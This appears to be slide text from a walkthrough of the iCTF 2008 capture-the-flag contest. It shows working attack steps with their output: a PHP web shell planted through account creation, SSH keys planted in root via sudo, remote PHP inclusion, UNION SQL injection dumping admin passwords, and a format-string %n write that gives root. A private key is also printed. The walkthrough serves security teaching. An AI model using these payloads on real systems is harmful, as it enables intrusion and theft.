iCTF 2008

Network Layout - 2008

UCSBTunnel

(Wireshark)

UCSB

InternetGateway

Internet

HubIPS(Astaro)

Prod Vmware

VulnWireshark

Hub

Switch

Attacker Attacker Attacker

Attacker Attacker Attacker

NASFile

Sharing

Special rule to send only traffic to/from IPS to file sharing Chunked up files

TestVmware

Vuln Vuln

Vuln Vuln

Timeline

0900 – Get fake FreeDos Image and Begin

1100 – Realized image is fake and revector

1700 – head to Old Chicagos!

http://athena.uccs.edu/ictf/index.php/Hacking_08

The Premise

THE INTRO

It's 9am and somebody is franticly knocking on your door...

You open the door and Jack Bauer is right there on your doorstep looking atyou with spirited eyes. He screams "Somebody set up us the bomb!"

You don't understand and reply: "What you say!", and then you slap Jackseveral times to get him out of his hysteric blubbering. After a few secondshe seems to regain control and starts talking...

"There is a nuclear device that is going to explode unless we stop it. We haveonly seven hours, until 4pm PST. The bomb has been set by a terrorist groupcalled Softerror.com. We have been watching them for months. We knew they

wereup to something big. But we never would have imagined something of this size."

You are still incredulous and ask: "So what do you want from me?"

http://ictf.cs.ucsb.edu/archive/iCTF_2008/story.txt

Rules

0) We might create rules on the fly, if we need to do so. :-)

1) Do not break stuff permanently. In the original CTF you could just rebootyour VMware machine. In this case, if you screw up your target, your targetSTAYS SCREWED. This might even mean that you are out of the competition

(e.g.,if you make a mistake and change the routing system or a firewall rule).Therefore, be careful. Also, services might run as root (you will have tobreak root in most cases anyway). Make sure you know what you are doing.

Ifyou are really stuck, please contact us (ctf-admin@lists.cs.ucsb.edu), but wecannot guarantee that we can recover from the damage.

2) Do not perform DOS attacks or spoofing. No attack requires spoofing yoursource address. Spoofing malicious traffic so that other teams are penalizedis considered lame and will be punished with immediate exclusion from thecompetition. Also, the resources that you are using are shared with otherteams (using virtualization), even if you cannot see them. So if you overloadyour network, you are making life miserable for everybody else.

The network

Web Server could access Financial and Dev

Financial and Dev could access the Bomb

Firewall Rules prevented direct connections

Network Layout - 2008

UCSBTunnel

(Wireshark)

UCSB

InternetGateway

Internet

HubIPS(Astaro)

Prod Vmware

VulnWireshark

Hub

Switch

Attacker Attacker Attacker

Attacker Attacker Attacker

NASFile

Sharing

Special rule to send only traffic to/from IPS to file sharing Chunked up files

TestVmware

Vuln Vuln

Vuln Vuln

iCTF 2008 - Trivia

Trivia!

http://ictf.cs.ucsb.edu/archive/iCTF_2008/challenges/

Sample.bin

Question: You are training as a malware analyzer for the LA Counter Terrorist Unit. The Unit's Malware Pattern Miner (TM) software has determined that the snippet in attachment is extremely common in malicious samples used by the Softerror terrorist group. Assuming that the attackers are targeting a Windows XP machine, what is the content of the esi register at the end of the execution? NOTE: the correct answer is *not* the concrete address, but what it points to...

13 byte file: 64 A1 30 00 00 00 8B 40 0C 8B 70 1C AD 8B 70 08

IDA Analysis

seg000:00000000 ; Input MD5 : 31086BCBDAEC2CEF1352E11FBCBB16D4seg000:00000000seg000:00000000 ; ---------------------------------------------------------------------------seg000:00000000 ; File Name : C:\Users\Mike\Desktop\sample.binseg000:00000000 ; Format : Binary fileseg000:00000000 ; Base Address: 0000h Range: 0000h - 0010h Loaded length: 0010hseg000:00000000seg000:00000000 .686pseg000:00000000 .mmxseg000:00000000 .model flatseg000:00000000seg000:00000000 ;

===========================================================================

seg000:00000000seg000:00000000 ; Segment type: Pure codeseg000:00000000 seg000 segment byte public 'CODE' use32seg000:00000000 assume cs:seg000seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothingseg000:00000000 mov eax, large fs:30hseg000:00000006 mov eax, [eax+0Ch]seg000:00000009 mov esi, [eax+1Ch]seg000:0000000C lodsdseg000:0000000D mov esi, [eax+8]seg000:0000000D seg000 endsseg000:0000000Dseg000:0000000Dseg000:0000000D end

Inline Assembly

Need to modify an instruction to compile it

int main(){ __asm { mov eax, fs:30h // mov eax, large fs:30h mov eax, [eax+0Ch] mov esi, [eax+1Ch] lodsd mov esi, [eax+8] }

return 0;}

Function Pointers

No required guessing for assembly pneumonics No disassembler needed

char a[] = "\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x70\x08";

void main(){

void (*b)() = (void(*)())&a;b();

}

Sample.bin Result

Pointer refers to: 0x7C800000 Obfuscated way to access

Kernel32.dll

Common obfuscation technique for malware

En0flag recommends google-fu the whole thing

iCTF 2008 – Main Competition (Hacking)

Softerror Website

Step 1

Analyze with Firefox web tools Demo!

Tools Firefox▪ Web Dev Plugin▪ Firebug▪ Firecookie▪ Hackbar

Paros – Proxy

Base 64 Encode/Decode

http://www.opinionatedgeek.com/dotnet/tools/Base64Encode/Default.aspx

createaccount.php

$filename = "users/" . basename($email);if (file_exists($filename)) { diefooter("Sorry, a user with that email already

exists."); }

$fh = fopen($filename, 'w+') or diefooter("I cannot create the account. Sorry.");

fwrite($fh, $password . "\n" . $first . ":" . $last . "\n" . $cc . ":" . $exp);

fclose($fh);

Simple PHP Shell

<?php system($_GET['cmd']); ?>

Use it to discover what’s there: http://128.198.60.76/users/a@a.php?

cmd=ls -alR ../ > out.txt

www-data did not have shell access

Files and Directories../:total 568drwxr-xr-x 4 1001 1001 4096 Dec 14 2008 .drwxr-xr-x 14 root root 4096 Dec 13 2008 ..-rw-r--r-- 1 1001 1001 1240 Dec 14 2008 about.php-rw-r--r-- 1 1001 1001 3218 Nov 26 2008 background2.jpg-rw-r--r-- 1 1001 1001 3675 Nov 26 2008 bomb.jpg-rw-r--r-- 1 1001 1001 2491 Nov 28 2008 contact.php-rw-r--r-- 1 1001 1001 1123 Nov 28 2008 createaccount.php-rw-r--r-- 1 1001 1001 3824 Nov 26 2008 explosion.jpg-rw-r--r-- 1 1001 1001 2758 Dec 4 2008 functions.phpdrwxrwxrwx 2 1001 1001 4096 Nov 1 10:49 ideas-rw-r--r-- 1 1001 1001 989 Nov 28 2008 index.php-rw-r--r-- 1 1001 1001 1104 Nov 28 2008 join.php-rw-r--r-- 1 1001 1001 1057 Nov 28 2008 login.php-rw-r--r-- 1 1001 1001 5233 Nov 26 2008 main_bottom.jpg-rw-r--r-- 1 1001 1001 3862 Nov 26 2008 main_middle.jpg-rw-r--r-- 1 1001 1001 4936 Nov 26 2008 main_top.jpg-rw-r--r-- 1 1001 1001 28260 Nov 26 2008 missed.jpg-rw-r--r-- 1 1001 1001 175 Nov 26 2008 missed.php-rw-r--r-- 1 1001 1001 946 Nov 28 2008 mission.php-rw-r--r-- 1 1001 1001 596 Nov 27 2008 mission.txt-rw-r--r-- 1 1001 1001 268188 Nov 27 2008 president.mov-rw-r--r-- 1 1001 1001 3644 Nov 27 2008 prog.c-rw-r--r-- 1 1001 1001 4165 Nov 28 2008 softerror.css-rw-r--r-- 1 1001 1001 137313 Nov 26 2008 softerror_facilities.jpg-rw-r--r-- 1 root root 216 Dec 4 2008 test.php.old <--- What is this?-rw-r--r-- 1 1001 1001 22892 Nov 26 2008 title.jpgdrwxrwxrwx 2 1001 1001 4096 Nov 1 10:56 users-rw-r--r-- 1 1001 1001 109 Nov 28 2008 variables.php

../ideas:total 36drwxrwxrwx 2 1001 1001 4096 Nov 1 10:49 .drwxr-xr-x 4 1001 1001 4096 Dec 14 2008 ..-rw-r--r-- 1 www-data www-data 37 Oct 29 21:48 idea1072674902.html…

../users:total 16drwxrwxrwx 2 1001 1001 4096 Nov 1 10:56 .drwxr-xr-x 4 1001 1001 4096 Dec 14 2008 ..-rw-r--r-- 1 www-data www-data 72 Nov 1 10:54 a@a.php-rw-r--r-- 1 www-data www-data 0 Nov 1 10:56 out.txt

test.php.old

Does sudo really work?

#!/usr/bin/php-cgi<?phprequire('variables.php');require('functions.php');myheader("Softerror.com - Financial Network");system("id");if ($_GET['cmd'] != "") {

system("sudo " . $_GET['cmd']);}myfooter();?>

What to do…

Root the box!

SSH Keys

AAAAB3NzaC1yc2EAAAABJQAAAIEAgMy2vBWaoSDYqthD6o4vNve8lMvWg5cs8mD3gPcDBsrrhHu5si6C4C9bsVd2iu/pDgfmNn3g6C1SvjOx4Rzq53LT0ccNfDy8dMsFATgyHC6J9I+B37VaPnHdtEHIrYMM5ig6zvj4eNQzxx0qCxsPXQyI+f1+nC03IOZCmDtH8Hs=

Adding the keys – Need to URL Encoder the Key

http://128.198.60.76/users/a@a.php?command=sudo mkdir /root/.ssh

http://128.198.60.76/users/a@a.php?command=echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAgMy2vBWaoSDYqthD6o4vNve8lMvWg5cs8mD3gPcDBsrrhHu5si6C4C9bsVd2iu%2fpDgfmNn3g6C1SvjOx4Rzq53LT0ccNfDy8dMsFATgyHC6J9I%2bB37VaPnHdtEHIrYMM5ig6zvj4eNQzxx0qCxsPXQyI%2bf1%2bnC03IOZCmDtH8Hs%3d > authorized_keys2

http://128.198.60.76/users/a@a.php?command=sudo mv authorized_keys2 /root/.ssh/authorized_keys2

http://128.198.60.76/users/a@a.php?command=sudo chown root:root /root/.ssh/authorized_keys2

W00t!Email UCSB and tell them what we did. Points.

Onto Financial and Dev.

Assume we know the IP addresses (can scan for them)

Financial: 128.198.60.77 Dev: 128.198.60.78

NmapFinancialroot@ubuntuserver:/sbin# nmap 128.198.60.77

Starting Nmap 4.62 ( http://nmap.org ) at 2009-11-01 12:50 PSTInteresting ports on 128.198.60.77:Not shown: 1713 closed portsPORT STATE SERVICE22/tcp open ssh80/tcp open httpMAC Address: 00:0C:29:57:F3:09 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.299 seconds

Developmentroot@ubuntuserver:/sbin# nmap 128.198.60.78

Starting Nmap 4.62 ( http://nmap.org ) at 2009-11-01 12:52 PSTInteresting ports on 128.198.60.78:Not shown: 1713 closed portsPORT STATE SERVICE22/tcp open ssh1337/tcp open wasteMAC Address: 00:0C:29:8A:54:79 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.348 seconds

Tunnel

We cannot directly connect to HTTP on Financial

Could setup weird routes and/or DNAT/SNAT

Easier to just use putty/ssh to tunnel Tunnel Demo

Financial – Level 1

Look inside the cookie:

YWRtaW4x:c4442e6e8420c452dfeb43463e045d58-YmFkZ3V5:edef990a12ef8fc35f890b8442c4062d-bGVuZGVy:8b9c2bba829069d84f1e77c3f25cb5ca

Base64:MD5-Base64:MD5-Base64:MD5

Financial – Level 2

Username “a” creates account id “97”

Username “aa” creates account id “9797”

Username “aaa” creates account id “979797”

ASCII decimal encoding of username is the account number

admin1 was the admin for the first level Maybe admin2 is the admin for the

second level?

Financial – Level 3

Modify database name reveals PHP warnings

Using proxy we see hidden comments including dbpath

Can modify where the PHP script is include from (Remote PHP Includes)

Financial – Level 3

Must disable PHP in Apache on 128.198.60.76

<?phppassthru(“/bin/ls -alR > /home/level03/public_html/test.out");?>

srcacc=&srcabi=&srccab=&dstacc=&dstabi=&dstcab=&amount=&db=mytest&adminpw=&dbpath=http://128.198.60.76/

Financial – Level 3 – test.out../:total 80drwxr-xr-x 3 level03 level03 4096 Nov 1 14:38 .drwxr-xr-x 3 level03 level03 4096 Dec 14 2008 ..-rw-r--r-- 1 level03 level03 3218 Nov 29 2008 background2.jpg-rw-r--r-- 1 level03 level03 3675 Nov 29 2008 bomb.jpgdrwxr-x--x 3 level03 level03 4096 Dec 4 2008 cgi-bin-rw-r--r-- 1 level03 level03 3824 Nov 29 2008 explosion.jpg-rw-r--r-- 1 level03 level03 78 Nov 30 2008 index.html-rw-r--r-- 1 level03 level03 5233 Nov 29 2008 main_bottom.jpg-rw-r--r-- 1 level03 level03 3862 Nov 29 2008 main_middle.jpg-rw-r--r-- 1 level03 level03 4936 Nov 29 2008 main_top.jpg-rw-r--r-- 1 level03 level03 4249 Nov 30 2008 softerror.css-rw-r--r-- 1 level03 level03 0 Nov 1 14:38 test.out-rw-r--r-- 1 level03 level03 22892 Nov 29 2008 title.jpg

../cgi-bin:total 36drwxr-x--x 3 level03 level03 4096 Dec 4 2008 .drwxr-xr-x 3 level03 level03 4096 Nov 1 14:38 ..-rwxr-xr-x 1 level03 level03 415 Dec 1 2008 admin.phpdrwxr-xr-x 2 level03 level03 4096 Nov 30 2008 databases-rw-r--r-- 1 level03 level03 2387 Dec 4 2008 functions.php-rwxr-xr-x 1 level03 level03 1067 Dec 4 2008 index.php-rwxr-xr-x 1 level03 level03 154 Dec 3 2008 test.php-rwxr-xr-x 1 level03 level03 815 Nov 30 2008 transaction.php-rw-r--r-- 1 level03 level03 109 Nov 29 2008 variables.php

../cgi-bin/databases:total 12drwxr-xr-x 2 level03 level03 4096 Nov 30 2008 .drwxr-x--x 3 level03 level03 4096 Dec 4 2008 ..-rw-r--r-- 1 level03 level03 222 Nov 29 2008 softerror.php

Financial – Level 3

<?phppassthru("/bin/cat /home/level03/public_html/cgi-bin/databases/softerror.php > /home/level03/public_html/test.out");?>

(For copy paste purposes) srcacc=&srcabi=&srccab=&dstacc=&dstabi=&dstcab=&amount=&db=mytest&adminpw=&dbpath=ht

tp://128.198.60.76/

Financial – Level 3

Output<?php

$_DATABASE = array ("adminpw" => "tsirorret","accounts" => array(

"762816TYVSBR" => "16782:19911","HJEY773TYEBB" => "18936:89849","899814630KL8" => "78736:11100","88277JJK019N" => "89383:00178"));

?>

Could install SSH keys at this time maybe?

I didn’t check if these accounts can ssh :S

Financial – Level 4

Search for a group – Search by size: A soft-error occurred:

Search failed: no such column: blah

4 Columns Returned – Name, Email, Size, Admin

Blackbox thinking (How do we search by size?): SELECT Name, Email, Size, Admin FROM

GroupFinancialContact WHERE Size > USERINPUT

Financial – Level 4

Incorrect Admin/Password: A soft-error occurred:

Authentication failed! User/password combination could not be found in admins table

Admins table – Probably has columns: username password

Financial – Level 4

Assumed Query: SELECT Name,Email,GroupSize,CreateAdmin

FROM GroupFinancialContact WHERE GroupSize > USERINPUT

Query we want: SELECT username,password FROM admins

We can union the two queries together! SELECT Name,Email,GroupSize,CreateAdmin FROM

GroupFinancialContact WHERE GroupSize > SomeValue UNION Select username,password FROM admins

Financial – Level 4

Input to try: 1 UNION Select username,password FROM admins

A soft-error occurred: Search failed: SELECTs to the left and right of

UNION do not have the same number of result columns

New input: 1 UNION Select 0,username,0,password FROM

admins

Financial – Level 4 - Output

Name Email Size Admin

0 admin1 0 baboon

0 admin4 0 DaBomb

0 admin2 0 wootwoot

0 admin3 0 tsirorret

10 sdf 10 admin1

5004 user@uzser.com 5004 admin3

20 cell@thecell.com 20 admin2

1021scary@scarydudes.com

1021 admin1

Financial

Now through interactive shell add SSH Keys

Now can access and scan/nmap the bomb!

Recap – Common Theme

Drop SSH Keys Exploit .php domain in email

addresses Understand common web data

encode/decode techniques Know php and it’s vulnerabilities

includes, register_globals, etc. Understand basic web fuzzing

techniques

iCTF 2008 - Development

Because binary may in fact be easier.

NmapDevelopmentroot@ubuntuserver:/sbin# nmap 128.198.60.78

Starting Nmap 4.62 ( http://nmap.org ) at 2009-11-01 12:52 PSTInteresting ports on 128.198.60.78:Not shown: 1713 closed portsPORT STATE SERVICE22/tcp open ssh1337/tcp open wasteMAC Address: 00:0C:29:8A:54:79 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.348 seconds

Development

root@ubuntuserver:/# telnet 128.198.60.78 1337Trying 128.198.60.78...Connected to 128.198.60.78.Escape character is '^]'.

Please select your choice: 1) See the current tasks 2) Add a task to the list 3) Work as Developer 1 4) Work as Developer 2Your choice: 2Insert your task:task 1 - kung fu go!Please select your choice: 1) See the current tasks 2) Add a task to the list 3) Work as Developer 1 4) Work as Developer 2Your choice: 1task 1 - kung fu go!

Please select your choice: 1) See the current tasks 2) Add a task to the list 3) Work as Developer 1 4) Work as Developer 2Your choice: 3bash: no job control in this shelldevel1@ubuntuserver:/home/devel1$

Netstat – wasn’t very helpfuldevel1@ubuntuserver:/home/devel1$ devel1@ubuntuserver:/home/devel1$ netstat -anp(Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.)Active Internet connections (servers and established)Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program nametcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -tcp 0 0 0.0.0.0:1337 0.0.0.0:* LISTEN -tcp 0 0 128.198.60.78:22 128.198.16.73:52962 ESTABLISHED -tcp 1 0 128.198.60.78:1337 128.198.60.77:54691 ESTABLISHED 25710/bashtcp6 0 0 :::22 :::* LISTEN -Active UNIX domain sockets (servers and established)Proto RefCnt Flags Type State I-Node PID/Program name Pathunix 2 [ ] DGRAM 5316 - @/com/ubuntu/upstartunix 2 [ ] DGRAM 5472 -

@/org/kernel/udev/udevdunix 5 [ ] DGRAM 12950 - /dev/logunix 2 [ ACC ] STREAM LISTENING 13035 -

/var/run/dbus/system_bus_socketunix 3 [ ] STREAM CONNECTED 360738 -

/var/run/dbus/system_bus_socketunix 3 [ ] STREAM CONNECTED 360737 -unix 3 [ ] STREAM CONNECTED 359421 -

/var/run/dbus/system_bus_socketunix 3 [ ] STREAM CONNECTED 359420 -unix 2 [ ] DGRAM 359417 -unix 2 [ ] DGRAM 17625 -unix 3 [ ] STREAM CONNECTED 13038 -unix 3 [ ] STREAM CONNECTED 13037 -unix 2 [ ] DGRAM 13008 -

Development – ps -A

devel1@ubuntuserver:/home/devel1$ devel1@ubuntuserver:/home/devel1$ ps -A PID TTY TIME CMD 1 ? 00:00:03 init 2 ? 00:00:00 kthreadd 3 ? 00:00:00 migration/0 4 ? 00:00:03 ksoftirqd/0 5 ? 00:00:00 watchdog/0 6 ? 00:00:49 events/0 7 ? 00:00:00 khelper 46 ? 00:00:00 kintegrityd/0 48 ? 00:00:02 kblockd/0 50 ? 00:00:00 kacpid 51 ? 00:00:00 kacpi_notify 176 ? 00:00:00 cqueue 180 ? 00:00:00 kseriod 220 ? 00:00:00 pdflush 221 ? 00:00:15 pdflush 222 ? 00:00:00 kswapd0 264 ? 00:00:00 aio/0 1196 ? 00:00:00 ata/0 1197 ? 00:00:00 ata_aux 1205 ? 00:00:46 mpt_poll_0 1993 ? 00:00:00 scsi_eh_0 2072 ? 00:00:00 scsi_eh_1 2073 ? 00:00:00 scsi_eh_2 2195 ? 00:00:09 kjournald 2313 ? 00:00:00 udevd 3385 ? 00:00:00 kpsmoused 4028 tty4 00:00:00 getty 4029 tty5 00:00:00 getty 4035 tty2 00:00:00 getty 4037 tty3 00:00:00 getty 4038 tty6 00:00:00 getty 4077 ? 00:00:10 syslogd 4095 ? 00:00:00 dd 4097 ? 00:00:00 klogd 4115 ? 00:00:15 dbus-daemon 4155 ? 00:00:00 atd 4180 ? 00:00:09 cron 4187 ? 00:00:00 softerror <-- /usr/sbin/softerror (# which softerror)10775 tty1 00:00:00 login24017 tty1 00:00:00 bash25887 ? 00:00:00 bash25907 ? 00:00:00 ps

Development – IDA/HR on SoftErrorvoid __cdecl manage_client(int fd){ ... while ( 1 ) { fwrite("Please select your choice:\n\t1) See the current tasks\n\t2) Add a task to the list\n\t3) Work as Developer 1\n\t4) Work as Developer 2\nYour fgets(buf, 512, stdin); v1 = strtol(buf, 0, 10); if ( (unsigned int)v1 <= 0xD ) { switch ( v1 ) { default: goto LABEL_3; case 13: ... __fprintf_chk( "When reporting a bug, please include the following information:\nStack: %08x Frame: %08x Buffer: %p [%s]\ndevel1_uid: %p [%u]\ndevel1_gid: %p ... fflush(stdout); continue; case 4: chdir(devel2_dir); setgid(devel2_gid); v9 = devel2_uid; goto LABEL_7; case 3: chdir(devel1_dir); setgid(devel1_gid); v9 = devel1_uid;LABEL_7: setuid(v9); execle("/bin/bash", "/bin/bash", "-i", 0, 0); break; case 2: ...

Development – Option 13root@ubuntuserver:/# telnet 128.198.60.78 1337Trying 128.198.60.78...Connected to 128.198.60.78.Escape character is '^]'.Please select your choice: 1) See the current tasks 2) Add a task to the list 3) Work as Developer 1 4) Work as Developer 2Your choice: 13When reporting a bug, please include the following information:Stack: bfa51d3c Frame: bfa51fa8 Buffer: 0xb7f33000 [13]devel1_uid: 0x804b0d0 [2001]devel1_gid: 0x804b0d4 [2001]devel2_uid: 0x804b0dc [2002]devel2_gid: 0x804b0e0 [2002]

Let’s cat /etc/passwd for uid/gid

Development – format string attack

Your choice: 2Insert your task:%x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x

%x %x %x %x %x %x %x %x %xPlease select your choice: 1) See the current tasks 2) Add a task to the list 3) Work as Developer 1 4) Work as Developer 2Your choice: 1task 1 - kung fu go!

b7f134c0 b7f12ff4 9cf43f8 bfa51df0 b7e23035 9cf43f8 b7f33000 b7f3349b 0 3

b7f134c0 b7f12ff4 9cf43f8 bfa51df0 b7e23035 9cf43f8 b7f33000 b7f3349b 0 3 0 0 bfa51d98 49b 801 0 0 12398 81a4 25207825

123

b7f1f4c0 bfa5bfa8 b7f3f000 b7f3f000 804b0d0 7d1 804b0d4 7d1 804b0dc 7d2 804b0e0 7d2 bfa5bd98 bfa5bfa8 7d1 7d1 0 12398 81a4 25207825 78252078 20782520 25207825 78252078 20782520 25207825 78252078 20782520 25207825 78252078 20782520 25207825 78252078 20782520 25207825

C printf Reference

.precision

description

.number

For integer specifiers (d, i, o, u, x, X): precision specifies the minimum number of digits to be written. If the value to be written is shorter than this number, the result is padded with leading zeros. The value is not truncated even if the result is longer. A precision of 0 means that no character is written for the value 0.For e, E and f specifiers: this is the number of digits to be printed after the decimal point.For g and G specifiers: This is the maximum number of significant digits to be printed.For s: this is the maximum number of characters to be printed. By default all characters are printed until the ending null character is encountered.For c type: it has no effect.When no precision is specified, the default is 1. If the period is specified without an explicit value for precision, 0 is assumed.

.*The precision is not specified in the format string, but as an additional integer value argument preceding the argument that has to be formatted.

specifier

Output Example

c Character a

d or i Signed decimal integer 392

e Scientific notation (mantise/exponent) using e character 3.9265e+2

nNothing printed. The argument must be a pointer to a signed int, where the number of characters written so far is stored.

n

s String of characters sample

%[flags][width][.precision][length]specifier

Development – format string attack

b7f1f4c0 bfa5bfa8 b7f3f000 b7f3f000 804b0d0 7d1 804b0d4 7d1 804b0dc 7d2 804b0e0 7d2 bfa5bd98 bfa5bfa8 7d1 7d1

20 bytes into it is the pointer to the UID

Format string has ability to write length of output buffer back to passed in pointer

%.0s%.0s%.0s%.0s%n printf(“%.0s%.0s%.0s%.0s%n”, b7f1f4c0, bfa5bfa8, b7f3f000, b7f3f000, 804b0d0)

Development – w00t!

Your choice: 2Insert your task:%.0s%.0s%.0s%.0s%nPlease select your choice: 1) See the current tasks 2) Add a task to the list 3) Work as Developer 1 4) Work as Developer 2Your choice: 1task 1 - kung fu go!

b7f1f4c0 bfa5bfa8 b7f3f000 b7f3f000 804b0d0 7d1 804b0d4 7d1 804b0dc 7d2

Please select your choice: 1) See the current tasks 2) Add a task to the list 3) Work as Developer 1 4) Work as Developer 2Your choice: 13When reporting a bug, please include the following information:Stack: bfa5bd3c Frame: bfa5bfa8 Buffer: 0xb7f3f000 [13]devel1_uid: 0x804b0d0 [0]devel1_gid: 0x804b0d4 [2001]devel2_uid: 0x804b0dc [2002]devel2_gid: 0x804b0e0 [2002]Please select your choice: 1) See the current tasks 2) Add a task to the list 3) Work as Developer 1 4) Work as Developer 2Your choice:

Development- root

Please select your choice: 1) See the current tasks 2) Add a task to the list 3) Work as Developer 1 4) Work as Developer 2Your choice: 3bash: no job control in this shellroot@ubuntuserver:/home/devel1# whoamirootroot@ubuntuserver:/home/devel1#

Now drop SSH keys and go to the bomb

The Bomb

I’m only one person… We’ll leave this as an exercise for

someone else to solve.

Questions / Comments

Priv Key

PuTTY-User-Key-File-2: ssh-rsaEncryption: noneComment: rsa-key-20091101Public-Lines: 4AAAAB3NzaC1yc2EAAAABJQAAAIEAgMy2vBWaoSDYqthD6o4vNve8lMvWg5cs8m

D3gPcDBsrrhHu5si6C4C9bsVd2iu/pDgfmNn3g6C1SvjOx4Rzq53LT0ccNfDy8dMsFATgyHC6J9I+B37VaPnHdtEHIrYMM5ig6zvj4eNQzxx0qCxsPXQyI+f1+nC03IOZCmDtH8Hs=Private-Lines: 8AAAAgDQ3UQAkbx66SgASfGYCSn4RaCClqf3/BGJC/I46oFyzITW1nk8nnNdtJSw4NvoOO+MX9Yu2fcXo3FryXN64skGRz6iS2bbJ9FdT6l4wyfaO6miXIPbsHvwmEWu4ZvIkyS9jw+mLJVjXy7Ts0T9ooGYf3gcKTFu09w9wG5MWjEVdAAAAQQDa/5+Erk1nnOx6URtgMWl1+lB17jDK0sT1F3U5LyFmuWZeHlmgdERokFkWP49cNdY9iyn94ZSvc+EL7P6B/B0jAAAAQQCWj7ST38FJXmyj2DC0/XStXn/6IDzGOwuFRfEOiown/Nex49/wOSYTE1ppbt9WXvFNL3pdrXqdP7NfZuqjz7DJAAAAQCpfsA2umsMLgQr2xzK4kK8wGlyJe5KjtdAbBK+aClxlMcz7u+TWAKRpdtx30mmjNFkqlcYqiXFdTA1cBpwaQWI=Private-MAC: 0d2181d38f44af1e77e59bbeeb335318c9cc2cdc